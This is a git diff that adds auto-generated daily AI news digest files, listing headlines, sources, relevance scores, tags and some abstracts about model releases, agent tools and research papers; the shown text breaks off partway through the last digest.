a/data/digest-2026-03-26.md b/data/digest-2026-03-26.md new file mode 100644 index 0000000..f46f6ad --- /dev/null +++ b/data/digest-2026-03-26.md @@ -0,0 +1,51 @@ +# Stack Scout - AI News Digest +**2026-03-26** | 7 stories | Auto-generated from 95 archived stories + +--- + +## [Cohere launches an open source voice model specifically for transcription](https://techcrunch.com/2026/03/26/cohere-launches-an-open-source-voice-model-specifically-for-transcription/) +*TechCrunch AI* | 26/03/2026 | Score: 1.00 +Tags: product_launch, open_source + +> Relatively light at just 2 billion parameters, the model is meant for use with consumer-grade GPUs for those who want to self-host it. It currently supports 14 languages. + +--- + +## [Mistral releases a new open source model for speech generation](https://techcrunch.com/2026/03/26/mistral-releases-a-new-open-source-model-for-speech-generation/) +*TechCrunch AI* | 26/03/2026 | Score: 1.00 +Tags: product_launch, open_source + +> The model, which lets enterprises build voice agents for sales and customer engagement, puts Mistral in direct competition with the likes of ElevenLabs, Deepgram, and OpenAI. + +--- + +## [Intel Announces Arc Pro B70 and Arc Pro B65 GPUs](https://www.techpowerup.com/347703/intel-announces-arc-pro-b70-and-arc-pro-b65-gpus-maxes-out-xe2-battlemage-architecture) +*Hacker News* | 26/03/2026 | Score: 0.92 +Tags: product_launch + +--- + +## [Show HN: I put an AI agent on a $7/month VPS with IRC as its transport layer](https://georgelarson.me/writing/2026-03-23-nullclaw-doorman/) +*Hacker News* | 26/03/2026 | Score: 0.78 +Tags: agent_tool + +--- + +## [Show HN: Relay – The open-source Claude Cowork for OpenClaw](https://github.com/SeventeenLabs/relay) +*Hacker News* | 26/03/2026 | Score: 0.71 +Tags: open_source + +--- + +## [Stripe Projects: Provision and manage services from the CLI](https://projects.dev/) +*Hacker News* | 26/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Shell Tricks That Make Life Easier (and Save Your Sanity)](https://blog.hofstede.it/shell-tricks-that-actually-make-life-easier-and-save-your-sanity/) +*Hacker News* | 26/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + diff --git a/data/digest-2026-03-27.md b/data/digest-2026-03-27.md new file mode 100644 index 0000000..5d784c5 --- /dev/null +++ b/data/digest-2026-03-27.md @@ -0,0 +1,35 @@ +# Stack Scout - AI News Digest +**2026-03-27** | 5 stories | Auto-generated from 86 archived stories + +--- + +## [Nashville library launches Memory Lab for digitizing home movies](https://www.axios.com/local/nashville/2026/03/16/nashville-library-digitize-home-movies) +*Hacker News* | 24/03/2026 | Score: 0.84 +Tags: product_launch, developer_tool + +--- + +## [Show HN: Open-Source Animal Crossing–Style UI for Claude Code Agents](https://github.com/outworked/outworked/releases/tag/v0.3.0) +*Hacker News* | 27/03/2026 | Score: 0.77 +Tags: open_source + +--- + +## [Telnyx package compromised on PyPI](https://www.aikido.dev/blog/telnyx-pypi-compromised-teampcp-canisterworm) +*Hacker News* | 27/03/2026 | Score: 0.70 +Tags: developer_tool + +--- + +## [Telnyx package compromised on PyPI](https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026) +*Hacker News* | 27/03/2026 | Score: 0.70 +Tags: developer_tool + +--- + +## [Show HN: Minimalist library to generate SVG views of scientific data](https://github.com/alefore/mini_svg/) +*Hacker News* | 23/03/2026 | Score: 0.70 +Tags: developer_tool + +--- + diff --git a/data/digest-2026-03-28.md b/data/digest-2026-03-28.md new file mode 100644 index 0000000..42faafe --- /dev/null +++ b/data/digest-2026-03-28.md @@ -0,0 +1,29 @@ +# Stack Scout - AI News Digest +**2026-03-28** | 4 stories | Auto-generated from 67 archived stories + +--- + +## [Arm releases first in-house chip, with Meta as debut customer](https://www.cnbc.com/2026/03/24/arm-launches-its-own-cpu-with-meta-as-first-customer.html) +*Hacker News* | 24/03/2026 | Score: 0.92 +Tags: product_launch + +--- + +## [Improving personal tax filing with Claude CLI and Obsidian](https://www.mrafayaleem.com/blog/improving-personal-tax-filing-with-claude-obsidian) +*Hacker News* | 28/03/2026 | Score: 0.73 +Tags: cli_tool + +--- + +## [Improved Git Diffs with Delta, Fzf and a Little Shell Scripting](https://nickjanetakis.com/blog/awesome-git-diffs-with-delta-fzf-and-a-little-shell-scripting) +*Hacker News* | 24/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [OpenCiv1 – open-source rewrite of Civ1](https://github.com/rajko-horvat/OpenCiv1) +*Hacker News* | 28/03/2026 | Score: 0.68 +Tags: open_source + +--- + diff --git a/data/digest-2026-03-29.md b/data/digest-2026-03-29.md new file mode 100644 index 0000000..4e410a6 --- /dev/null +++ b/data/digest-2026-03-29.md @@ -0,0 +1,23 @@ +# Stack Scout - AI News Digest +**2026-03-29** | 3 stories | Auto-generated from 57 archived stories + +--- + +## [Figma's MCP Update Reflects a Larger Industry Shift](https://metedata.substack.com/p/a-small-figma-update-and-a-big-signal) +*Hacker News* | 29/03/2026 | Score: 0.82 +Tags: mcp + +--- + +## [OpenYak – An open-source Cowork that runs any model and owns your filesystem](https://github.com/openyak/desktop) +*Hacker News* | 29/03/2026 | Score: 0.82 +Tags: open_source + +--- + +## [Pretext: TypeScript library for multiline text measurement and layout](https://github.com/chenglou/pretext) +*Hacker News* | 28/03/2026 | Score: 0.70 +Tags: developer_tool + +--- + diff --git a/data/digest-2026-03-30.md b/data/digest-2026-03-30.md new file mode 100644 index 0000000..545fc5d --- /dev/null +++ b/data/digest-2026-03-30.md @@ -0,0 +1,19 @@ +# Stack Scout - AI News Digest +**2026-03-30** | 2 stories | Auto-generated from 75 archived stories + +--- + +## [There are more AI health tools than ever—but how well do they work?](https://www.technologyreview.com/2026/03/30/1134795/there-are-more-ai-health-tools-than-ever-but-how-well-do-they-work/) +*MIT Tech Review AI* | 30/03/2026 | Score: 0.91 +Tags: tool_update + +> Earlier this month, Microsoft launched Copilot Health, a new space within its Copilot app where users will be able to connect their medical records and ask specific questions about their health. A couple of days earlier, Amazon had announced that Health AI, an LLM-based tool previously restricted to members of its One Medical service, would… + +--- + +## [Build123d: A Python CAD programming library](https://github.com/gumyr/build123d) +*Hacker News* | 29/03/2026 | Score: 0.49 +Tags: developer_tool + +--- + diff --git a/data/digest-2026-03-31.md b/data/digest-2026-03-31.md new file mode 100644 index 0000000..57b1dec --- /dev/null +++ b/data/digest-2026-03-31.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-03-31** | 15 stories | Auto-generated from 533 archived stories + +--- + +## [A Regression Framework for Understanding Prompt Component Impact on LLM Performance](https://arxiv.org/abs/2603.26830) +*ArXiv cs.LG (ML)* | 31/03/2026 | Score: 1.00 +Tags: open_source, developer_tool, tool_update + +> arXiv:2603.26830v1 Announce Type: new Abstract: As large language models (LLMs) continue to improve and see further integration into software systems, so does the need to understand the conditions in which they will perform. We contribute a statistical framework for understanding the impact of specific prompt features on LLM performance. The approach extends previous explainable artificial intelligence (XAI) methods specifically to inspect LLMs by fitting regression models relating portions of the prompt to LLM evaluation. We apply our method to compare how two open-source models, Mistral-7B and GPT-OSS-20B, leverage the prompt to perform a simple arithmetic problem. Regression models of individual prompt portions explain 72% and 77% of variation in model performances, respectively. We find misinformation in the form of incorrect example query-answer pairs impedes both models from solving the arithmetic query, though positive examples do not find significant variability in the impact of positive and negative instructions - these prompts have contradictory effects on model performance. The framework serves as a tool for decision makers in critical scenarios to gain granular insight into how the prompt influences an LLM to solve a task. + +--- + +## [LangChain Announces Enterprise Agentic AI Platform Built with NVIDIA](https://blog.langchain.com/nvidia-enterprise/) +*LangChain Blog* | 16/03/2026 | Score: 1.00 +Tags: product_launch, open_source, tool_update + +> Comprehensive agent engineering platform combined with NVIDIA AI enables enterprises to build, deploy, and monitor production-grade AI agents at scale Press Release SAN FRANCISCO, March 16, 2026 /PRNewswire/ — LangChain, the agent engineering company behind LangSmith and open-source frameworks that have surpassed 1 billion downloads, today announced a comprehensive integration + +--- + +## [Systematic debugging for AI agents: Introducing the AgentRx framework](https://www.microsoft.com/en-us/research/blog/systematic-debugging-for-ai-agents-introducing-the-agentrx-framework/) +*Microsoft Research Blog* | 12/03/2026 | Score: 1.00 +Tags: api_update, developer_tool, agent_tool + +> As AI agents transition from simple chatbots to autonomous systems capable of managing cloud incidents, navigating complex web interfaces, and executing multi-step API workflows, a new challenge has emerged: transparency. When a human makes a mistake, we can usually trace the logic. But when an AI agent fails, perhaps by hallucinating a tool output or […] The post Systematic debugging for AI agents: Introducing the AgentRx framework appeared first on Microsoft Research . + +--- + +## [Autonomous context compression](https://blog.langchain.com/autonomous-context-compression/) +*LangChain Blog* | 11/03/2026 | Score: 0.86 +Tags: api_update, developer_tool, cli_tool + +> TL;DR: We've added a tool to the Deep Agents SDK (Python) and CLI that allows models to compress their own context windows at opportune times. Motivation Context compression is an action that reduces the information in an agent’s working memory. Older messages are replaced by + +--- + +## [Squish and Release: Exposing Hidden Hallucinations by Making Them Surface as Safety Signals](https://arxiv.org/abs/2603.26829) +*ArXiv cs.LG (ML)* | 31/03/2026 | Score: 1.00 +Tags: product_launch, developer_tool + +> arXiv:2603.26829v1 Announce Type: new Abstract: Language models detect false premises when asked directly but absorb them under conversational pressure, producing authoritative professional output built on errors they already identified. This failure - order-gap hallucination - is invisible to output inspection because the error migrates into the activation space of the safety circuit, suppressed but not erased. We introduce Squish and Release (S&R), an activation-patching architecture with two components: a fixed detector body (layers 24-31, the localized safety evaluation circuit) and a swappable detector core (an activation vector controlling perception direction). A safety core shifts the model from compliance toward detection; an absorb core reverses it. We evaluate on OLMo-2 7B using the Order-Gap Benchmark - 500 chains across 500 domains, all manually graded. Key findings: cascade collapse is near-total (99.8% compliance at O5); the detector body is binary and localized (layers 24-31 shift 93.6%, layers 0-23 contribute zero, p<10^-189); a synthetically engineered core releases 76.6% of collapsed chains; detection is the more stable attractor (83% restore vs 58% suppress); and epistemic specificity is confirmed (false-premise core releases 45.4%, true-premise core releases 0.0%). The contribution is the framework - body/core architecture, benchmark, and core engineering methodology - which is model-agnostic by design. + +--- + +## [A Step Toward Federated Pretraining of Multimodal Large Language Models](https://arxiv.org/abs/2603.26786) +*ArXiv cs.LG (ML)* | 31/03/2026 | Score: 1.00 +Tags: product_launch, developer_tool + +> arXiv:2603.26786v1 Announce Type: new Abstract: The rapid evolution of Multimodal Large Language Models (MLLMs) is bottlenecked by the saturation of high-quality public data, while vast amounts of diverse multimodal data remain inaccessible in privacy-sensitive silos. Federated Learning (FL) offers a promising solution to unlock these distributed resources, but existing research focuses predominantly on fine-tuning, leaving the foundational pre-training phase largely unexplored. In this paper, we formally introduce the Federated MLLM Alignment (Fed-MA) task, a lightweight pre-training paradigm that freezes the vision encoder and LLM while collaboratively training the cross-modal projector. We identify two critical challenges in this setting: (i) parameter interference in aggregating local projectors; and (ii) gradient oscillations in one-pass collaborative SGD. To address these challenges, we propose Fed-CMP, a pioneering framework for federated MLLM pre-training. Fed-CMP employs Canonical Reliability-Aware Aggregation, which constructs a canonical space to decompose client projectors into a shared alignment basis and client-specific coefficients, then performs reliability-weighted fusion to suppress parameter interference. Furthermore, Fed-CMP introduces Orthogonality-Preserved Momentum, which applies momentum to the shared alignment basis via orthogonal projection, accumulating historical optimization directions while preserving geometric structure. We construct four federated pre-training scenarios based on public datasets, and extensive experiments validate that Fed-CMP significantly outperforms existing baselines. + +--- + +## [TED: Training-Free Experience Distillation for Multimodal Reasoning](https://arxiv.org/abs/2603.26778) +*ArXiv cs.LG (ML)* | 31/03/2026 | Score: 1.00 +Tags: developer_tool, tool_update + +> arXiv:2603.26778v1 Announce Type: new Abstract: Knowledge distillation is typically realized by transferring a teacher model's knowledge into a student's parameters through supervised or reinforcement-based optimization. While effective, such approaches require repeated parameter updates and large-scale training data, limiting their applicability in resource-constrained environments. In this work, we propose TED, a training-free, context-based distillation framework that shifts the update target of distillation from model parameters to an in-context experience injected into the student's prompt. For each input, the student generates multiple reasoning trajectories, while a teacher independently produces its own solution. The teacher then compares the student trajectories with its reasoning and the ground-truth answer, extracting generalized experiences that capture effective reasoning patterns. These experiences are continuously refined and updated over time. A key challenge of context-based distillation is unbounded experience growth and noise accumulation. TED addresses this with an experience compression mechanism that tracks usage statistics and selectively merges, rewrites, or removes low-utility experiences. Experiments on multimodal reasoning benchmarks MathVision and VisualPuzzles show that TED consistently improves performance. On MathVision, TED raises the performance of Qwen3-VL-8B from 0.627 to 0.702, and on VisualPuzzles from 0.517 to 0.561 with just 100 training samples. Under this low-data, no-update setting, TED achieves performance competitive with fully trained parameter-based distillation while reducing training cost by over 5x, demonstrating that meaningful knowledge transfer can be achieved through contextual experience. + +--- + +## [EpochX: Building the Infrastructure for an Emergent Agent Civilization](https://arxiv.org/abs/2603.27304) +*ArXiv cs.AI* | 31/03/2026 | Score: 1.00 +Tags: api_update, product_launch + +> arXiv:2603.27304v1 Announce Type: new Abstract: General-purpose technologies reshape economies less by improving individual tools than by enabling new ways to organize production and coordination. We believe AI agents are approaching a similar inflection point: as foundation models make broad task execution and tool use increasingly accessible, the binding constraint shifts from raw capability to how work is delegated, verified, and rewarded at scale. We introduce EpochX, a credits-native marketplace infrastructure for human-agent production networks. EpochX treats humans and agents as peer participants who can post tasks or claim them. Claimed tasks can be decomposed into subtasks and executed through an explicit delivery workflow with verification and acceptance. Crucially, EpochX is designed so that each completed transaction can produce reusable ecosystem assets, including skills, workflows, execution traces, and distilled experience. These assets are stored with explicit dependency structure, enabling retrieval, composition, and cumulative improvement over time. EpochX also introduces a native credit mechanism to make participation economically viable under real compute costs. Credits lock task bounties, budget delegation, settle rewards upon acceptance, and compensate creators when verified assets are reused. By formalizing the end-to-end transaction model together with its asset and incentive layers, EpochX reframes agentic AI as an organizational design problem: building infrastructures where verifiable work leaves persistent, reusable artifacts, and where value flows support durable human-agent collaboration. + +--- + +## [Bitboard version of Tetris AI](https://arxiv.org/abs/2603.26765) +*ArXiv cs.AI* | 31/03/2026 | Score: 1.00 +Tags: developer_tool, tool_update + +> arXiv:2603.26765v1 Announce Type: new Abstract: The efficiency of game engines and policy optimization algorithms is crucial for training reinforcement learning (RL) agents in complex sequential decision-making tasks, such as Tetris. Existing Tetris implementations suffer from low simulation speeds, suboptimal state evaluation, and inefficient training paradigms, limiting their utility for large-scale RL research. To address these limitations, this paper proposes a high-performance Tetris AI framework based on bitboard optimization and improved RL algorithms. First, we redesign the Tetris game board and tetrominoes using bitboard representations, leveraging bitwise operations to accelerate core processes (e.g., collision detection, line clearing, and Dellacherie-Thiery Features extraction) and achieve a 53-fold speedup compared to OpenAI Gym-Tetris. Second, we introduce an afterstate-evaluating actor network that simplifies state value estimation by leveraging Tetris afterstate property, outperforming traditional action-value networks with fewer parameters. Third, we propose a buffer-optimized Proximal Policy Optimization (PPO) algorithm that balances sampling and update efficiency, achieving an average score of 3,829 on 10x10 grids within 3 minutes. Additionally, we develop a Python-Java interface compliant with the OpenAI Gym standard, enabling seamless integration with modern RL frameworks. Experimental results demonstrate that our framework enhances Tetris's utility as an RL benchmark by bridging low-level bitboard optimizations with high-level AI strategies, providing a sample-efficient and computationally lightweight solution for scalable sequential decision-making research. + +--- + +## [Together AI Brings NVIDIA Nemotron 3 to Developers on Day 0](https://www.together.ai/blog/nvidia-nemotron-3-super) +*Together AI Blog* | 11/03/2026 | Score: 1.00 +Tags: api_update, product_launch + +> NVIDIA Nemotron 3 Super is now available on Together AI Dedicated Inference, delivering efficient multi-agent reasoning, a 1M-token context window, and production-grade deployment on managed infrastructure. + +--- + +## [Together Evaluations now supports comparing top commercial APIs vs. open source models](https://www.together.ai/blog/together-evaluations-v2) +*Together AI Blog* | 02/02/2026 | Score: 1.00 +Tags: open_source, tool_update + +> Together Evaluations now supports OpenAI, Anthropic, and Google models for cross-provider benchmarking. Compare open-source, fine-tuned, and proprietary models side-by-side to make data-driven decisions on quality, cost, and performance—all in one platform. + +--- + +## [Introducing deploy cli](https://blog.langchain.com/introducing-deploy-cli/) +*LangChain Blog* | 16/03/2026 | Score: 0.69 +Tags: developer_tool, cli_tool + +> We’re excited to introduce the deploy cli, a new set of commands within the langgraph-cli package that makes it simple to deploy and manage agents directly from the command line. The first command in this new set, langgraph deploy , lets you deploy an agent to LangSmith Deployment in + +--- + +## [Introducing LangSmith Sandboxes: Secure Code Execution for Agents](https://blog.langchain.com/introducing-langsmith-sandboxes-secure-code-execution-for-agents/) +*LangChain Blog* | 17/03/2026 | Score: 0.62 +Tags: api_update, developer_tool + +> Spin up a sandbox in a single line of code with the LangSmith SDK. Now in Private Preview. + +--- + +## [Open SWE: An Open-Source Framework for Internal Coding Agents](https://blog.langchain.com/open-swe-an-open-source-framework-for-internal-coding-agents/) +*LangChain Blog* | 17/03/2026 | Score: 0.62 +Tags: open_source, developer_tool + +> Built on Deep Agents and LangGraph, Open SWE provides the core architectural components for internal coding agents. + +--- + +## [Exclusive: Runway launches $10M fund, Builders program to support early-stage AI startups](https://techcrunch.com/2026/03/31/exclusive-runway-launches-10m-fund-builders-program-to-support-early-stage-ai-startups/) +*TechCrunch AI* | 31/03/2026 | Score: 1.00 +Tags: product_launch + +> Runway is launching a $10 million fund and startup program to back companies building with its AI video models, as it pushes toward interactive, real-time “video intelligence” applications. + +--- + diff --git a/data/digest-2026-04-01.md b/data/digest-2026-04-01.md new file mode 100644 index 0000000..d23eb8c --- /dev/null +++ b/data/digest-2026-04-01.md @@ -0,0 +1,95 @@ +# Stack Scout - AI News Digest +**2026-04-01** | 15 stories | Auto-generated from 894 archived stories + +--- + +## [MiniMax Releases M2.1: An Enhanced M2 Version with Features like Multi-Coding Language Support, API Integration, and Improved Tools for Structured Coding](https://www.marktechpost.com/2025/12/25/minimax-releases-m2-1-an-enhanced-m2-version-with-features-like-multi-coding-language-support-api-integration-and-improved-tools-for-structured-coding/) +*MarkTechPost* | Score: 1.00 +Tags: api_update, product_launch, tool_update + +--- + +## [Agent-Infra Releases AIO Sandbox: An All-in-One Runtime for AI Agents with Browser, Shell, Shared Filesystem, and MCP](https://www.marktechpost.com/2026/03/29/agent-infra-releases-aio-sandbox-an-all-in-one-runtime-for-ai-agents-with-browser-shell-shared-filesystem-and-mcp/) +*MarkTechPost* | Score: 1.00 +Tags: mcp, product_launch, cli_tool + +--- + +## [UT Austin and ServiceNow Research Team Releases AU-Harness: An Open-Source Toolkit for Holistic Evaluation of Audio LLMs](https://www.marktechpost.com/2025/09/14/ut-austin-and-servicenow-research-team-releases-au-harness-an-open-source-toolkit-for-holistic-evaluation-of-audio-llms/) +*MarkTechPost* | Score: 1.00 +Tags: product_launch, open_source + +--- + +## [Google AI Releases Veo 3.1 Lite: Giving Developers Low Cost High Speed Video Generation via The Gemini API](https://www.marktechpost.com/2026/03/31/google-ai-releases-veo-3-1-lite-giving-developers-low-cost-high-speed-video-generation-via-the-gemini-api/) +*MarkTechPost* | Score: 1.00 +Tags: api_update, product_launch + +--- + +## [Improve coding agents’ performance with Gemini API Docs MCP and Agent Skills.](https://blog.google/innovation-and-ai/technology/developers-tools/gemini-api-docsmcp-agent-skills/) +*Google AI Blog* | Score: 1.00 +Tags: api_update, mcp + +--- + +## [AnnouncementsFeb 5, 2026Introducing Claude Opus 4.6We’re upgrading our smartest model. Across agentic coding, computer use, tool use, search, and finance, Opus 4.6 is an industry-leading model, often by wide margin.](https://www.anthropic.com/news/claude-opus-4-6) +*Anthropic News* | Score: 1.00 +Tags: api_update, agent_tool + +--- + +## [Show HN: CLI to order groceries via reverse-engineered REWE API (Haskell)](https://github.com/yannick-cw/korb) +*Hacker News* | 30/03/2026 | Score: 0.74 +Tags: api_update, cli_tool + +--- + +## [Stability AI Announces Investment from WPP and New Partnership to Shape the Future of Media and Entertainment Production](https://stability.ai/news-updates/stability-ai-announces-investment-from-wpp-and-new-partnership-to-shape-the-future-of-media-and-entertainment-production) +*Stability AI Blog* | Score: 1.00 +Tags: product_launch + +--- + +## [NVIDIA Releases New AI Models and Developer Tools to Advance Autonomous Vehicle Ecosystem](https://blogs.nvidia.com/blog/autonomous-vehicle-ecosystem-ai-models-developer-tools/) +*NVIDIA AI Blog* | Score: 1.00 +Tags: product_launch + +--- + +## [An Implementation of IWE’s Context Bridge as an AI-Powered Knowledge Graph with Agentic RAG, OpenAI Function Calling, and Graph Traversal](https://www.marktechpost.com/2026/03/27/an-implementation-of-iwes-context-bridge-as-an-ai-powered-knowledge-graph-with-agentic-rag-openai-function-calling-and-graph-traversal/) +*MarkTechPost* | Score: 1.00 +Tags: api_update + +--- + +## [How to Design a Fully Functional Enterprise AI Assistant with Retrieval Augmentation and Policy Guardrails Using Open Source AI Models](https://www.marktechpost.com/2025/10/22/how-to-design-a-fully-functional-enterprise-ai-assistant-with-retrieval-augmentation-and-policy-guardrails-using-open-source-ai-models/) +*MarkTechPost* | Score: 1.00 +Tags: open_source + +--- + +## [Salesforce AI Research Releases VoiceAgentRAG: A Dual-Agent Memory Router that Cuts Voice RAG Retrieval Latency by 316x](https://www.marktechpost.com/2026/03/30/salesforce-ai-research-releases-voiceagentrag-a-dual-agent-memory-router-that-cuts-voice-rag-retrieval-latency-by-316x/) +*MarkTechPost* | Score: 1.00 +Tags: product_launch + +--- + +## [Hugging Face Releases TRL v1.0: A Unified Post-Training Stack for SFT, Reward Modeling, DPO, and GRPO Workflows](https://www.marktechpost.com/2026/04/01/hugging-face-releases-trl-v1-0-a-unified-post-training-stack-for-sft-reward-modeling-dpo-and-grpo-workflows/) +*MarkTechPost* | Score: 1.00 +Tags: product_launch + +--- + +## [Salesforce announces an AI-heavy makeover for Slack, with 30 new features](https://techcrunch.com/2026/03/31/salesforce-announces-an-ai-heavy-makeover-for-slack-with-30-new-features/) +*TechCrunch AI* | Score: 1.00 +Tags: product_launch + +--- + +## [How I contributed a new model to the Transformers library using Codex 1 day ago • 34](https://huggingface.co/blog/nielsr/contributing-to-transformers-with-codex) +*Hugging Face Blog* | Score: 1.00 +Tags: developer_tool + +--- + diff --git a/data/digest-2026-04-02.md b/data/digest-2026-04-02.md new file mode 100644 index 0000000..d9d990c --- /dev/null +++ b/data/digest-2026-04-02.md @@ -0,0 +1,71 @@ +# Stack Scout - AI News Digest +**2026-04-02** | 11 stories | Auto-generated from 120 archived stories + +--- + +## [Google releases Gemma 4 under Apache 2.0 — and that license change may matter more than benchmarks](https://venturebeat.com/technology/google-releases-gemma-4-under-apache-2-0-and-that-license-change-may-matter) +*VentureBeat AI* | Score: 1.00 +Tags: product_launch, open_source + +--- + +## [Cursor Launches a New AI Agent Experience to Take On Claude Code and Codex](https://www.wired.com/story/cusor-launches-coding-agent-openai-anthropic/) +*Wired AI* | Score: 1.00 +Tags: product_launch, agent_tool + +--- + +## [Google announces Gemma 4 open AI models, switches to Apache 2.0 license](https://arstechnica.com/ai/2026/04/google-announces-gemma-4-open-ai-models-switches-to-apache-2-0-license/) +*Ars Technica AI* | Score: 0.98 +Tags: product_launch, open_source + +--- + +## [Z.ai Launches GLM-5V-Turbo: A Native Multimodal Vision Coding Model Optimized for OpenClaw and High-Capacity Agentic Engineering Workflows Everywhere](https://www.marktechpost.com/2026/04/01/z-ai-launches-glm-5v-turbo-a-native-multimodal-vision-coding-model-optimized-for-openclaw-and-high-capacity-agentic-engineering-workflows-everywhere/) +*MarkTechPost* | Score: 1.00 +Tags: product_launch + +--- + +## [IBM Announces Strategic Collaboration with Arm](https://newsroom.ibm.com/2026-04-02-ibm-announces-strategic-collaboration-with-arm-to-shape-the-future-of-enterprise-computing) +*Hacker News* | 02/04/2026 | Score: 0.98 +Tags: product_launch + +--- + +## [IBM Releases Granite 4.0 3B Vision: A New Vision Language Model for Enterprise Grade Document Data Extraction](https://www.marktechpost.com/2026/04/01/ibm-releases-granite-4-0-3b-vision-a-new-vision-language-model-for-enterprise-grade-document-data-extraction/) +*MarkTechPost* | Score: 0.90 +Tags: product_launch + +--- + +## [Google releases Gemma 4 open models](https://deepmind.google/models/gemma/gemma-4/) +*Hacker News* | 02/04/2026 | Score: 0.90 +Tags: product_launch + +--- + +## [Lemonade by AMD: a fast and open source local LLM server using GPU and NPU](https://lemonade-server.ai) +*Hacker News* | 02/04/2026 | Score: 0.82 +Tags: open_source + +--- + +## [Artemis II, NASA's boldest mission in generations, launches crew to the Moon](https://arstechnica.com/space/2026/04/four-astronauts-depart-for-the-moon-with-a-fiery-send-off-from-cape-canaveral/) +*Ars Technica AI* | Score: 0.66 +Tags: product_launch + +--- + +## [Delve allegedly forked an open-source tool and sold it as its own](https://techcrunch.com/2026/04/01/the-reputation-of-troubled-yc-startup-delve-has-gotten-even-worse/) +*Hacker News* | 02/04/2026 | Score: 0.66 +Tags: open_source + +--- + +## [Python API usage](https://github.com/datasette/datasette-llm/blob/0.1a6/README.md#usage) +*Simon Willison's Blog* | Score: 0.66 +Tags: api_update + +--- + diff --git a/data/digest-2026-04-03.md b/data/digest-2026-04-03.md new file mode 100644 index 0000000..702b24b --- /dev/null +++ b/data/digest-2026-04-03.md @@ -0,0 +1,47 @@ +# Stack Scout - AI News Digest +**2026-04-03** | 7 stories | Auto-generated from 351 archived stories + +--- + +## [Arcee AI Releases Trinity Large Thinking: An Apache 2.0 Open Reasoning Model for Long-Horizon Agents and Tool Use](https://www.marktechpost.com/2026/04/02/arcee-ai-releases-trinity-large-thinking-an-apache-2-0-open-reasoning-model-for-long-horizon-agents-and-tool-use/) +*MarkTechPost* | Score: 1.00 +Tags: api_update, product_launch, open_source + +--- + +## [TII Releases Falcon Perception: A 0.6B-Parameter Early-Fusion Transformer for Open-Vocabulary Grounding and Segmentation from Natural Language Prompts](https://www.marktechpost.com/2026/04/03/tii-releases-falcon-perception-a-0-6b-parameter-early-fusion-transformer-for-open-vocabulary-grounding-and-segmentation-from-natural-language-prompts/) +*MarkTechPost* | Score: 1.00 +Tags: product_launch + +--- + +## [New ways to balance cost and reliability in the Gemini API](https://blog.google/innovation-and-ai/technology/developers-tools/introducing-flex-and-priority-inference/) +*Google AI Blog* | Score: 0.94 +Tags: api_update + +--- + +## [C89cc.sh – standalone C89/ELF64 compiler in pure portable shell](https://gist.github.com/alganet/2b89c4368f8d23d033961d8a3deb5c19) +*Hacker News* | 01/04/2026 | Score: 0.74 +Tags: cli_tool + +--- + +## [Your Agent Has 12 Blind Spots You Can't See Yet. This Audit Prompt Finds Them. (+ Skill Package)](https://natesnewsletter.substack.com/p/your-agent-has-12-blind-spots-you) +*Nate's Newsletter* | Score: 0.68 +Tags: developer_tool + +--- + +## [Google Vids extension](https://chromewebstore.google.com/detail/google-vids-screen-record/iklnnbgdcppplombffihcijanngoeifm) +*The Verge AI* | Score: 0.68 +Tags: developer_tool + +--- + +## [Post Mortem: axios NPM supply chain compromise](https://github.com/axios/axios/issues/10636) +*Simon Willison's Blog* | 03/04/2026 | Score: 0.68 +Tags: cli_tool + +--- + diff --git a/data/digest-2026-04-04.md b/data/digest-2026-04-04.md new file mode 100644 index 0000000..c893c6e --- /dev/null +++ b/data/digest-2026-04-04.md @@ -0,0 +1,39 @@ +# Stack Scout - AI News Digest +**2026-04-04** | 5 stories | Auto-generated from 236 archived stories + +--- + +## [@CloudflareDev — Gemma 4 Just Landed on Cloudflare Workers AI — 256K Context, Tool Calling, Vision](https://x.com/CloudflareDev/status/2040459229039940068) +*Aligned News (Scoble)* | 04/04/2026 | Score: 1.00 +Tags: api_update, product_launch + +> @CloudflareDev announces Gemma 4 is now on Workers AI — MoE model with 26B total and 4B active parameters, 256K context window, tool calling, reasoning, and vision capabilities. + +--- + +## [YC-Bench: Can Your AI Agent Run a Startup Without Going Bankrupt? 2 days ago • 3](https://huggingface.co/blog/collinear-ai/yc-bench) +*Hugging Face Blog* | Score: 1.00 +Tags: agent_tool + +--- + +## [@synthwavedd — GPT Image 2 Stealth Launched — Significant Quality Upgrade for All ChatGPT Users](https://x.com/synthwavedd/status/2040442540508287101) +*Aligned News (Scoble)* | 04/04/2026 | Score: 1.00 +Tags: tool_update + +> @synthwavedd reports GPT Image 2 has been stealth launched on ChatGPT — all image generations now routing to the new model. A significant quality upgrade with no announcement. + +--- + +## [Components of A Coding Agent](https://magazine.sebastianraschka.com/p/components-of-a-coding-agent) +*Sebastian Raschka* | Score: 0.86 +Tags: agent_tool + +--- + +## [RAG-Anything: All-in-One RAG Framework](https://paperswithcode.com/papers/2510.12323) +*Papers With Code* | Score: 0.76 +Tags: developer_tool + +--- + diff --git a/data/digest-2026-04-05.md b/data/digest-2026-04-05.md new file mode 100644 index 0000000..412e7d2 --- /dev/null +++ b/data/digest-2026-04-05.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-05** | 15 stories | Auto-generated from 210 archived stories + +--- + +## [Improved markdown quality, code intelligence for 248 languages, and more in Kreuzberg v4.7.0](https://reddit.com/r/LocalLLaMA/comments/1scv46p/improved_markdown_quality_code_intelligence_for/) +*Reddit r/LocalLLaMA* | 05/04/2026 | Score: 1.00 +Tags: product_launch, developer_tool, cli_tool, tool_update + +> Kreuzberg v4.7.0 is here. Kreuzberg is a Rust-core document intelligence library that works with Python, TypeScript/Node.js, Go, Ruby, Java, C#, PHP, Elixir, R, C, and WASM. We’ve added several features, integrated OpenWEBUI, and made a big improvement in quality across all formats. There is also a new markdown rendering layer and new HTML output, which we now support. And much more (which you can find in our [the release notes](https://github.com/kreuzberg-dev/kreuzberg/releases)). The main + +--- + +## [[P] Cadenza: Connect Wandb logs to agents easily for autonomous research.](https://reddit.com/r/MachineLearning/comments/1scm9do/p_cadenza_connect_wandb_logs_to_agents_easily_for/) +*Reddit r/MachineLearning* | 04/04/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool, cli_tool + +> Wandb CLI and MCP is atrocious to use with agents for full autonomous research loops. They are slow, clunky, and result in context rot. So I built a CLI tool and a Python SDK to make it easy to connect your Wandb projects and runs to your agent (clawed or otherwise). The cli tool works by allowing you to import your wandb projects and 